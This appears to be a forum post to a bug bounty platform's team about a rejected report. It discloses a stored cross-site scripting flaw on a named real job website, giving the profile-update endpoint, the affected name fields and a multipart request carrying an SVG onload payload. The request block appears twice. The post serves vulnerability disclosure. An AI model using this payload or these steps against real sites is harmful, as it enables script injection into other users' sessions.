Rejected Submissions Issuse.
Posted: Sat Jul 10, 2021 2:18 pm
Hi, OBB team my reject ID: 2074677 the Vulnearble XSS web: www.kumarijob.com and POST /jobseeker/dashboard/update-profile HTTP/1.1 then path referer: https://www.kumarijob.com/jobseeker/dashboard/personal step by next step reduce login to the account so path : /jobseeker/dashboard goto to the β"Edit Profile" > Edit Basic Information the π΅vulnearble parmaeter are: Fullname, Middel Name, Last Name is effect, Cross site scripting (XSS) the post data download below let check out!
----------------------------------------------------------------------------------------------------------
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"
"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"
MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"
LN Vuln Payload
i hope soon as posiable to my "On Hold Vulnerabilities" thank you OBB
----------------------------------------------------------------------------------------------------------
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"
"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"
MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"
LN Vuln Payload
i hope soon as posiable to my "On Hold Vulnerabilities" thank you OBB